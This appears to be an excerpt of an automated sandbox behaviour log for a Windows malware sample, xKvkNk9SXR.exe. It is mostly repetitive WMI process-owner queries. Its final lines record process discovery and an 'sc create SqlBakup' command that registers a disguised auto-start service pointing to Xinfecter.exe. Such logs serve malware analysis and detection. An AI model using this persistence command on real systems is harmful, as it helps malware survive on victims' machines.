      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="992"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="444"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="732"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="280"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1032"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1056"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1068"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1148"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1188"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1232"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1324"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1384"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1416"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1424"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1460"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1584"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1612"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1660"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1688"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1700"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1820"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1836"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1936"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1944"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1952"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2024"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2096"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2152"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2188"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2204"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2240"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2392"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2400"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2440"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2484"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2492"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2528"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2588"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2596"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2628"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2768"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2868"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2932"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3260"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3512"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3696"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3756"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3984"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2456"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4132"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4800"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4572"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5152"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5932"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6708"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6792"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6836"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6960"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3584"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5500"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5280"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4296"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4820"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5840"::GetOwner
      Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1440"::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1440"::GetOwner
      Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\SysWOW64\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="332"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="420"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="496"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="504"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="564"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="632"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="780"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="788"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="924"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="992"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="444"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="732"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="280"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1032"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1056"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1068"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1148"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1188"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1232"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1324"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1384"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1416"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1424"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1460"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1584"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1612"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1660"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1688"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1700"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1820"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1836"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1936"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1944"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1952"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2024"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2096"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2152"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2188"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2204"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2240"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2392"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2400"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2440"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2484"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2492"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2528"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2588"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2596"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2628"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2768"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2868"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2932"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3260"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3512"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3696"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3756"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3984"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2456"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4132"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4800"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4572"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5152"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5932"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6708"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6792"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6836"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6960"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3584"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5500"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5280"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4296"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4820"::GetOwner
      Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5840"::GetOwner
      Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'XKVKNK9SXR.EXE'
      Source: C:\Windows\SysWOW64\cmd.exe	File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: xKvkNk9SXR.exe	ReversingLabs: Detection: 81%
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	File read: C:\Users\user\Desktop\xKvkNk9SXR.exe
      Source: unknown	Process created: C:\Users\user\Desktop\xKvkNk9SXR.exe "C:\Users\user\Desktop\xKvkNk9SXR.exe"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
      Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
